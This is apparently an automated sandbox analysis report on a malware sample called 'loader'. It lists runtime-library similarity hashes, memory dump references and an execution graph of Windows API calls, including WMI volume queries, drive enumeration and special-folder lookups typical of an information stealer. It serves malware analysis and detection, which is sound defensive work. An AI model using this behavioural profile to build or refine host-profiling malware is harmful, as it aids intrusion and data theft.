                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustPointer
                                                                                      • String ID:
                                                                                      • API String ID: 1740715915-0
                                                                                      • Opcode ID: 72428a0fefa5478153430e7892126b125a3b3930e6a152aed7edf46717284987
                                                                                      • Instruction ID: 03c141280c4a8897a15ff7e7f8d3c6626093b268292bc30286acf0d814370ea5
                                                                                      • Opcode Fuzzy Hash: 72428a0fefa5478153430e7892126b125a3b3930e6a152aed7edf46717284987
                                                                                      • Instruction Fuzzy Hash: D451D171635202EFEB298F14D841B7A73A5EF04302F14082DED45975D1EBB1ECA8CB98
                                                                                      APIs
                                                                                        • Part of subcall function 0025D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,002587B1,?,00000000,?), ref: 0025D192
                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,0025C95E,?,?,?,00000000), ref: 0025C61C
                                                                                      • __dosmaperr.LIBCMT ref: 0025C623
                                                                                      • GetLastError.KERNEL32(00000000,0025C95E,?,?,00000000,?,?,?,00000000,00000000,?,0025C95E,?,?,?,00000000), ref: 0025C65D
                                                                                      • __dosmaperr.LIBCMT ref: 0025C664
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1913693674-0
                                                                                      • Opcode ID: a6b5cb61374c5b45c51b2418979d7a4298660f5e12615caa41baface93497806
                                                                                      • Instruction ID: 21ed4d63c8830745ffef1300c01e5526130a3d39cc12b2f0764a152e64f297de
                                                                                      • Opcode Fuzzy Hash: a6b5cb61374c5b45c51b2418979d7a4298660f5e12615caa41baface93497806
                                                                                      • Instruction Fuzzy Hash: BD21B671220306AF9B119F65888192AB7ACEF853667608428FC15D7551FB70ED64CF98
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6236fa884aa80aa6d18ac14249d9a6f0cb06bdfcde1e00cbd0ffebf974b1bdb9
                                                                                      • Instruction ID: 02fb4af0ab13f4c14d732131bf8682099d04beccf8d083d05f7cc7e2d830f937
                                                                                      • Opcode Fuzzy Hash: 6236fa884aa80aa6d18ac14249d9a6f0cb06bdfcde1e00cbd0ffebf974b1bdb9
                                                                                      • Instruction Fuzzy Hash: 2F21F671220306AFCB20AF65DC82D2AB7ACEF543AB7204515FC1997251FB30EC68DB94
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0025D235
                                                                                        • Part of subcall function 0025D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,002587B1,?,00000000,?), ref: 0025D192
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025D26D
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025D28D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 158306478-0
                                                                                      • Opcode ID: db2806dc4e560c1848fa97c6953e50ea0fbd68843fa1e4606cefbe689c1f7048
                                                                                      • Instruction ID: b99cb1e09e5c7e99c8c780d1d7eea01b070f155d0b8c2adcc3d0bf598ea1d63a
                                                                                      • Opcode Fuzzy Hash: db2806dc4e560c1848fa97c6953e50ea0fbd68843fa1e4606cefbe689c1f7048
                                                                                      • Instruction Fuzzy Hash: D01161B15215197E6B312B716C89CAF696CDE95397B104424FC01D2142FFB0CD6A4979
                                                                                      APIs
                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0025FF31,00000000,00000001,00000000,?,?,0025E9DA,?,00000000,00000000), ref: 002607D7
                                                                                      • GetLastError.KERNEL32(?,0025FF31,00000000,00000001,00000000,?,?,0025E9DA,?,00000000,00000000,?,?,?,0025E320,00000000), ref: 002607E3
                                                                                        • Part of subcall function 00260840: CloseHandle.KERNEL32(FFFFFFFE,002607F3,?,0025FF31,00000000,00000001,00000000,?,?,0025E9DA,?,00000000,00000000,?,?), ref: 00260850
                                                                                      • ___initconout.LIBCMT ref: 002607F3
                                                                                        • Part of subcall function 00260815: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002607B1,0025FF1E,?,?,0025E9DA,?,00000000,00000000,?), ref: 00260828
                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0025FF31,00000000,00000001,00000000,?,?,0025E9DA,?,00000000,00000000,?), ref: 00260808
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                      • String ID:
                                                                                      • API String ID: 2744216297-0
                                                                                      • Opcode ID: 6f7f305ef27482cea997056cac3d49f91f02d3cfdf804e389ccc4d98d7d1299a
                                                                                      • Instruction ID: 24a98747bf9a8eebc277b662fcf28eeb9497838dc9e7a53946f5c3fc13af0477
                                                                                      • Opcode Fuzzy Hash: 6f7f305ef27482cea997056cac3d49f91f02d3cfdf804e389ccc4d98d7d1299a
                                                                                      • Instruction Fuzzy Hash: E7F01C36010119BBCF225F91EC0898B3F2AFF087A1F00C461FA0886121CAB28CB0AFD0
                                                                                      APIs
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00258D75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___except_validate_context_record
                                                                                      • String ID: csm$csm
                                                                                      • API String ID: 3493665558-3733052814
                                                                                      • Opcode ID: bbd809115c2aca3d0a3fe9ae4ed24aa0adb14bd821432e3b8416d2a0c5fa3de4
                                                                                      • Instruction ID: 2f7d1f28a3efbabd783d98e9e7196753a872ab44b6f65e751935a643a00bd155
                                                                                      • Opcode Fuzzy Hash: bbd809115c2aca3d0a3fe9ae4ed24aa0adb14bd821432e3b8416d2a0c5fa3de4
                                                                                      • Instruction Fuzzy Hash: C131F276520216EFCF224F50D8069AA7B76FF09316B08455AFC0429121CBB2DCB5DB89
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002549EA
                                                                                      • ___raise_securityfailure.LIBCMT ref: 00254AD2
                                                                                        • Part of subcall function 002559FC: RaiseException.KERNEL32(E06D7363,00000001,00000003,002549DE,BB40E64E,?,?,?,002549DE,?,00269B2C), ref: 00255A5C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
                                                                                      • String ID: %$
                                                                                      • API String ID: 3749517692-3799354126
                                                                                      • Opcode ID: 2b28ca7194309545c6121189bb5b58f522f892f8ad9dd6569ab43bd89ac715e3
                                                                                      • Instruction ID: fe0b5617b5ba878bc353fd6dab0c342715ba2c299eeb4c302163b3bff46e6ef9
                                                                                      • Opcode Fuzzy Hash: 2b28ca7194309545c6121189bb5b58f522f892f8ad9dd6569ab43bd89ac715e3
                                                                                      • Instruction Fuzzy Hash: 173190B4510204DEC700FF55FC5AA647BA8BB08314F60C12BE94AE62A1EBF0A598CF84
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002549EA
                                                                                      • ___raise_securityfailure.LIBCMT ref: 00254AD2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                      • String ID: %$
                                                                                      • API String ID: 3761405300-3799354126
                                                                                      • Opcode ID: cc29c8e077d55098bed9bd7877f14c25788e948132f12c193b989cd5c505b20f
                                                                                      • Instruction ID: 12c1d5cde64b558d43aff64aa659439abb8fba1af57bb09ea51695c54149db47
                                                                                      • Opcode Fuzzy Hash: cc29c8e077d55098bed9bd7877f14c25788e948132f12c193b989cd5c505b20f
                                                                                      • Instruction Fuzzy Hash: 8521E0B9510240DED304EF15FD5A6607BA4FB48314FA0D06BE98AEB3A1E7F0A8848F45
                                                                                      APIs
                                                                                        • Part of subcall function 00254533: __EH_prolog3_GS.LIBCMT ref: 0025453A
                                                                                      • std::domain_error::domain_error.LIBCPMT ref: 002545EC
                                                                                        • Part of subcall function 002543A4: std::exception::exception.LIBCONCRT ref: 002543BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog3_std::domain_error::domain_errorstd::exception::exception
                                                                                      • String ID: CD%$CD%
                                                                                      • API String ID: 2144476180-4139937635
                                                                                      • Opcode ID: f1454be56b7ad518233fb53ea0b8d7a41b8e6c876a9a0924b9e853f3de22148c
                                                                                      • Instruction ID: 6751bf555e1f6d2364732107d4362f27901196a9cd8b990498a0e862403f046d
                                                                                      • Opcode Fuzzy Hash: f1454be56b7ad518233fb53ea0b8d7a41b8e6c876a9a0924b9e853f3de22148c
                                                                                      • Instruction Fuzzy Hash: C6015E70E10218ABCF18EF69D8458AEBBF8FF48708B50841EE81597340DB74DA55CF94

                                                                                      Execution Graph

                                                                                      Execution Coverage:10.6%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:47%
                                                                                      Total number of Nodes:596
                                                                                      Total number of Limit Nodes:48
                                                                                      execution_graph 10408 40d440 GetPixel 10409 426a43 10410 426a52 10409->10410 10412 426a61 10409->10412 10411 4417f0 LdrInitializeThunk 10410->10411 10411->10412 10766 43a3c0 10767 43a040 10766->10767 10768 43a3e7 10766->10768 10767->10768 10769 43c440 LdrInitializeThunk 10767->10769 10770 43c3a0 LdrInitializeThunk 10767->10770 10771 439fc2 10767->10771 10772 43c240 LdrInitializeThunk 10767->10772 10769->10767 10770->10767 10773 43bf80 RtlFreeHeap 10771->10773 10772->10767 10775 439fc8 10773->10775 10774 43a022 10775->10774 10777 43e990 LdrInitializeThunk 10775->10777 10777->10774 10591 440ec0 10592 440ee0 10591->10592 10593 44102e 10592->10593 10595 43e990 LdrInitializeThunk 10592->10595 10595->10593 10778 427dc6 10780 427d10 10778->10780 10779 427e3c 10780->10779 10783 43e990 LdrInitializeThunk 10780->10783 10782 427e5c 10783->10782 10109 40d4c5 10110 40d4f0 10109->10110 10113 439920 10110->10113 10112 40d534 10114 439980 CoCreateInstance 10113->10114 10116 439a13 SysAllocString 10114->10116 10117 439dea 10114->10117 10120 439a9a 10116->10120 10119 439dfa GetVolumeInformationW 10117->10119 10127 439e15 10119->10127 10121 439aa2 CoSetProxyBlanket 10120->10121 10122 439dd9 SysFreeString 10120->10122 10123 439ac2 SysAllocString 10121->10123 10124 439dcf 10121->10124 10122->10117 10126 439ba0 10123->10126 10124->10122 10126->10126 10128 439bc4 SysAllocString 10126->10128 10127->10112 10130 439beb 10128->10130 10129 439db6 SysFreeString SysFreeString 10129->10124 10130->10129 10131 439dac 10130->10131 10132 439c2f VariantInit 10130->10132 10131->10129 10134 439c90 10132->10134 10133 439d9b VariantClear 10133->10131 10134->10133 10784 4291c4 10785 429592 10784->10785 10788 4291e0 10784->10788 10790 429224 10784->10790 10786 43c3a0 LdrInitializeThunk 10785->10786 10789 4296af 10786->10789 10788->10785 10788->10790 10791 43c6a0 10788->10791 10792 43c6d0 10791->10792 10793 43c71e 10792->10793 10795 43e990 LdrInitializeThunk 10792->10795 10793->10788 10795->10793 10413 42704a 10414 427010 10413->10414 10414->10413 10415 4417f0 LdrInitializeThunk 10414->10415 10415->10414 10135 40e3ca 10140 4345c0 10135->10140 10137 40e3d0 10138 40e3df CoUninitialize 10137->10138 10139 40e410 10138->10139 10139->10139 10141 4345f5 GetSystemMetrics GetSystemMetrics 10140->10141 10142 434638 10141->10142 10416 429048 10419 43c240 10416->10419 10420 429056 10419->10420 10421 43c251 10419->10421 10421->10420 10423 43e990 LdrInitializeThunk 10421->10423 10423->10420 10796 419fca 10799 419fc9 10796->10799 10797 441400 LdrInitializeThunk 10797->10799 10798 4414e0 LdrInitializeThunk 10798->10799 10799->10796 10799->10797 10799->10798 10799->10799 10801 43e990 LdrInitializeThunk 10799->10801 10801->10799 10424 42404e 10425 424060 10424->10425 10425->10425 10426 4240d0 2 API calls 10425->10426 10427 4240b9 10426->10427 10428 41c84e 10434 41c67c 10428->10434 10429 43c240 LdrInitializeThunk 10429->10434 10431 43bfe0 2 API calls 10431->10434 10432 41cae2 10434->10428 10434->10429 10434->10431 10434->10432 10435 41cd2b 10434->10435 10436 41cbfe 10434->10436 10438 41cb40 10434->10438 10439 41ca0f 10434->10439 10441 41cdd9 10434->10441 10446 43c440 10434->10446 10454 43c3a0 10434->10454 10435->10441 10460 43e990 LdrInitializeThunk 10435->10460 10459 43e990 LdrInitializeThunk 10436->10459 10437 43bf80 RtlFreeHeap 10437->10432 10438->10436 10438->10438 10458 43e990 LdrInitializeThunk 10438->10458 10439->10437 10440 41cefb 10440->10440 10441->10440 10461 43e990 LdrInitializeThunk 10441->10461 10447 43c4b6 10446->10447 10448 43c452 10446->10448 10447->10434 10448->10447 10451 43c4ae 10448->10451 10462 43e990 LdrInitializeThunk 10448->10462 10450 43c5ce 10450->10447 10450->10450 10464 43e990 LdrInitializeThunk 10450->10464 10451->10450 10463 43e990 LdrInitializeThunk 10451->10463 10455 43c3aa 10454->10455 10457 43c40e 10454->10457 10455->10457 10465 43e990 LdrInitializeThunk 10455->10465 10457->10434 10458->10436 10459->10435 10460->10441 10461->10440 10462->10451 10463->10450 10464->10447 10465->10457 10143 409350 10144 40935f 10143->10144 10145 409367 SHGetSpecialFolderPathW 10144->10145 10146 40962d ExitProcess 10144->10146 10147 40937d 10145->10147 10148 409385 GetCurrentThreadId GetCurrentProcessId 10147->10148 10149 409628 10147->10149 10150 4093b1 GetForegroundWindow 10148->10150 10151 4093af 10148->10151 10158 43e8d0 10149->10158 10153 409520 10150->10153 10151->10150 10153->10149 10157 40d460 CoInitializeEx 10153->10157 10161 440060 10158->10161 10160 43e8d5 FreeLibrary 10160->10146 10162 440069 10161->10162 10162->10160 10802 4199d1 10803 4199dc 10802->10803 10804 441090 LdrInitializeThunk 10803->10804 10810 419a0f 10803->10810 10805 419b6d 10804->10805 10806 419b93 10805->10806 10807 441400 LdrInitializeThunk 10805->10807 10811 419bc1 10805->10811 10808 4414e0 LdrInitializeThunk 10806->10808 10806->10811 10807->10806 10808->10811 10811->10811 10812 441090 LdrInitializeThunk 10811->10812 10813 419f9d 10811->10813 10812->10813 10814 43e990 LdrInitializeThunk 10813->10814 10814->10810 10466 424a50 10467 424a68 CoCreateInstance 10466->10467 10468 424a83 10466->10468 10467->10468 10468->10468 10596 426ed0 10599 441f20 10596->10599 10600 441f40 10599->10600 10603 441f9e 10600->10603 10607 43e990 LdrInitializeThunk 10600->10607 10601 426efa 10603->10601 10606 44205e 10603->10606 10608 43e990 LdrInitializeThunk 10603->10608 10604 43bf80 RtlFreeHeap 10604->10601 10606->10604 10607->10603 10608->10606 10469 40f055 10470 40f080 10469->10470 10473 40f0d2 10470->10473 10475 43e990 LdrInitializeThunk 10470->10475 10471 40f162 10473->10471 10476 43e990 LdrInitializeThunk 10473->10476 10475->10473 10476->10471 10609 426add 10611 426ab0 10609->10611 10610 441f20 2 API calls 10610->10611 10611->10609 10611->10610 10477 429e60 10479 429e79 10477->10479 10478 429fbe 10478->10478 10479->10478 10479->10479 10482 43e990 LdrInitializeThunk 10479->10482 10481 42a3be 10482->10481 10179 43bfe0 10180 43c010 10179->10180 10183 43c04e 10180->10183 10187 43e990 LdrInitializeThunk 10180->10187 10181 43c211 10183->10181 10186 43c12e 10183->10186 10188 43e990 LdrInitializeThunk 10183->10188 10189 43bf80 10186->10189 10187->10183 10188->10186 10190 43bfd6 10189->10190 10191 43bf95 RtlFreeHeap 10189->10191 10190->10181 10191->10190 10483 41b862 10485 41b890 10483->10485 10484 41b90e 10490 43e990 LdrInitializeThunk 10484->10490 10485->10484 10489 43e990 LdrInitializeThunk 10485->10489 10488 41ba1c 10489->10484 10490->10488 10491 41a462 10492 41a46d 10491->10492 10494 41a6de 10492->10494 10499 43e990 LdrInitializeThunk 10492->10499 10495 41a7ae 10494->10495 10500 43e990 LdrInitializeThunk 10494->10500 10497 43bfe0 2 API calls 10495->10497 10501 43e990 LdrInitializeThunk 10495->10501 10497->10495 10499->10494 10500->10495 10501->10495 10612 427ce1 10613 427ce0 10612->10613 10613->10612 10614 427d07 10613->10614 10618 43e990 LdrInitializeThunk 10613->10618 10619 43e990 LdrInitializeThunk 10614->10619 10617 427e5c 10618->10614 10619->10617 10823 40dfe7 10824 40e010 10823->10824 10824->10824 10825 40e06e 10824->10825 10827 43e990 LdrInitializeThunk 10824->10827 10827->10825 10502 42906a 10503 4290d0 10502->10503 10503->10503 10508 43c750 10503->10508 10506 43c750 LdrInitializeThunk 10507 4291ba 10506->10507 10507->10507 10510 43c7a0 10508->10510 10509 42910a 10509->10506 10515 43c7de 10510->10515 10516 43e990 LdrInitializeThunk 10510->10516 10512 43ce0e 10512->10509 10517 43e990 LdrInitializeThunk 10512->10517 10514 43e990 LdrInitializeThunk 10514->10515 10515->10509 10515->10512 10515->10514 10516->10515 10517->10509 10625 40d8ea CoUninitialize 10687 40b36a 10688 40b37f 10687->10688 10689 40b6e0 RtlFreeHeap 10688->10689 10690 40b388 10689->10690 10206 425f6f 10207 425f77 10206->10207 10208 441240 LdrInitializeThunk 10207->10208 10213 425fa6 10207->10213 10209 4260a1 10208->10209 10210 42643c 10209->10210 10209->10213 10215 4260b4 10209->10215 10217 4240d0 10210->10217 10214 426251 GetLogicalDrives 10216 441240 LdrInitializeThunk 10214->10216 10215->10214 10215->10215 10216->10213 10229 441090 10217->10229 10219 424993 10220 424110 10220->10219 10224 424206 10220->10224 10233 43e990 LdrInitializeThunk 10220->10233 10222 4248c8 10223 43bf80 RtlFreeHeap 10222->10223 10225 4248d8 10223->10225 10224->10222 10224->10224 10228 43bf80 RtlFreeHeap 10224->10228 10234 43e990 LdrInitializeThunk 10224->10234 10225->10219 10235 43e990 LdrInitializeThunk 10225->10235 10228->10224 10231 4410b0 10229->10231 10230 4411ee 10230->10220 10231->10230 10236 43e990 LdrInitializeThunk 10231->10236 10233->10220 10234->10224 10235->10225 10236->10230 10832 40cbf1 10833 43e8f0 2 API calls 10832->10833 10834 40cbfb 10833->10834 10518 441670 10519 4416a0 10518->10519 10522 4416fe 10519->10522 10524 43e990 LdrInitializeThunk 10519->10524 10520 4417ae 10522->10520 10525 43e990 LdrInitializeThunk 10522->10525 10524->10522 10525->10520 10242 42337a 10243 423390 10242->10243 10246 4414e0 10243->10246 10248 441510 10246->10248 10247 44156e 10249 4233b6 10247->10249 10253 43e990 LdrInitializeThunk 10247->10253 10248->10247 10252 43e990 LdrInitializeThunk 10248->10252 10252->10247 10253->10249 10835 41a3f9 10837 41a3fe 10835->10837 10836 41c309 10837->10836 10838 41c255 10837->10838 10858 41f3b0 10837->10858 10838->10836 10838->10838 10870 43a120 10838->10870 10841 43bfe0 2 API calls 10842 41c667 10841->10842 10842->10841 10842->10842 10843 43c240 LdrInitializeThunk 10842->10843 10844 43c440 LdrInitializeThunk 10842->10844 10845 43c3a0 LdrInitializeThunk 10842->10845 10848 41cbfe 10842->10848 10849 41cae2 10842->10849 10850 41ca0f 10842->10850 10851 41cdd9 10842->10851 10852 41cd2b 10842->10852 10853 41cb40 10842->10853 10843->10842 10844->10842 10845->10842 10846 43bf80 RtlFreeHeap 10846->10849 10847 41cefb 10848->10848 10880 43e990 LdrInitializeThunk 10848->10880 10850->10846 10851->10847 10882 43e990 LdrInitializeThunk 10851->10882 10852->10851 10881 43e990 LdrInitializeThunk 10852->10881 10853->10848 10879 43e990 LdrInitializeThunk 10853->10879 10859 41f3d4 10858->10859 10883 4194b0 10859->10883 10861 41f4d6 10862 4194b0 2 API calls 10861->10862 10863 41f57c 10862->10863 10864 4194b0 2 API calls 10863->10864 10865 41f5f7 10864->10865 10866 4194b0 2 API calls 10865->10866 10867 41f6c6 10866->10867 10868 4194b0 2 API calls 10867->10868 10869 41f745 10868->10869 10869->10837 10871 4417f0 LdrInitializeThunk 10870->10871 10872 43a13c 10871->10872 10873 441c10 2 API calls 10872->10873 10875 43a20e 10872->10875 10874 43a166 10873->10874 10876 442220 2 API calls 10874->10876 10877 43a1a8 10874->10877 10875->10842 10876->10877 10877->10875 10901 43e990 LdrInitializeThunk 10877->10901 10879->10848 10880->10852 10881->10851 10882->10847 10884 4194d0 10883->10884 10884->10884 10885 441090 LdrInitializeThunk 10884->10885 10892 41959a 10885->10892 10886 4196a0 10889 4196f6 10886->10889 10891 441400 LdrInitializeThunk 10886->10891 10896 41972c 10886->10896 10899 419663 10886->10899 10887 41967c 10894 439ed0 2 API calls 10887->10894 10888 41968d 10888->10886 10888->10889 10890 441090 LdrInitializeThunk 10888->10890 10888->10896 10888->10899 10895 4414e0 LdrInitializeThunk 10889->10895 10889->10896 10889->10899 10890->10886 10891->10889 10892->10886 10892->10887 10892->10888 10892->10889 10892->10892 10893 439ed0 2 API calls 10892->10893 10892->10896 10892->10899 10893->10887 10894->10888 10895->10896 10896->10899 10900 43e990 LdrInitializeThunk 10896->10900 10898 41992d 10899->10861 10899->10899 10900->10898 10901->10875 10699 42dd7b 10700 42e27e 10699->10700 10703 439600 10700->10703 10706 439628 10703->10706 10704 42e296 10708 4396ce 10706->10708 10712 43e990 LdrInitializeThunk 10706->10712 10708->10704 10710 4397b0 10708->10710 10711 43e990 LdrInitializeThunk 10708->10711 10710->10704 10713 43e990 LdrInitializeThunk 10710->10713 10711->10708 10712->10706 10713->10710 10714 41cf78 10716 41cf8a 10714->10716 10715 41da73 10717 441240 LdrInitializeThunk 10716->10717 10718 41d587 10716->10718 10717->10716 10718->10715 10719 441240 LdrInitializeThunk 10718->10719 10719->10718 10254 40e17a 10255 40e1a0 10254->10255 10257 40e1fe 10255->10257 10329 43e990 LdrInitializeThunk 10255->10329 10259 40e29e 10257->10259 10330 43e990 LdrInitializeThunk 10257->10330 10276 426530 10259->10276 10261 40e30c 10282 426760 10261->10282 10263 40e32c 10290 428420 10263->10290 10277 4265d0 10276->10277 10277->10277 10278 42672d 10277->10278 10279 42669c 10277->10279 10344 441c10 10277->10344 10278->10261 10338 421fd0 10279->10338 10283 42676e 10282->10283 10354 4417f0 10283->10354 10285 426665 10286 441c10 2 API calls 10285->10286 10287 42669c 10285->10287 10288 42672d 10285->10288 10286->10285 10289 421fd0 2 API calls 10287->10289 10288->10263 10289->10288 10291 42844c 10290->10291 10292 40e34c 10290->10292 10296 4286a0 10290->10296 10291->10292 10293 441c10 2 API calls 10291->10293 10295 4417f0 LdrInitializeThunk 10291->10295 10291->10296 10301 428ba0 10292->10301 10293->10291 10295->10291 10296->10292 10297 4417f0 LdrInitializeThunk 10296->10297 10300 43e990 LdrInitializeThunk 10296->10300 10359 43e8f0 10296->10359 10366 441920 